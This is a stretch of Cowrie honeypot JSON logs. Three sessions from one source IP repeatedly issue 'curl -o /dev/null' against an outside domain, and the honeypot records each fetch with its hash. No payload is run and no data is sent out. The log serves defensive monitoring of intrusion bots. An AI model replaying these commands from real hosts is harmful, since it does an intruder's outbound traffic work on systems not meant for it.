{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.100770Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.104040Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.107213Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.135054Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.136888Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.139335Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.140739Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.141255Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.144394Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.145237Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.146777Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.147392Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.179088Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.181243Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.183118Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.185127Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.185714Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.187994Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.189252Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.192694Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.193617Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.223573Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.227028Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.238789Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.239537Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.260763Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.261460Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.263133Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.264293Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.267097Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.270262Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.275108Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.276075Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.301277Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.303812Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.305426Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.305943Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.308163Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.308716Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.312615Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.318298Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.319296Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.344582Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.345317Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.347572Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.348866Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.351733Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.355584Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.356462Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.384521Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.385419Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.389708Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.390754Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.393706Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.394217Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.420750Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.423828Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.449296Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.450837Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.451498Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.453701Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.454313Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.457536Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.461122Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.461763Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.464495Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.492589Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.493384Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.496841Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.497261Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.500379Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.501422Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.501973Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.532556Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.534438Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.535620Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.536709Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.538680Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.539332Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.542286Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.543461Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.544270Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
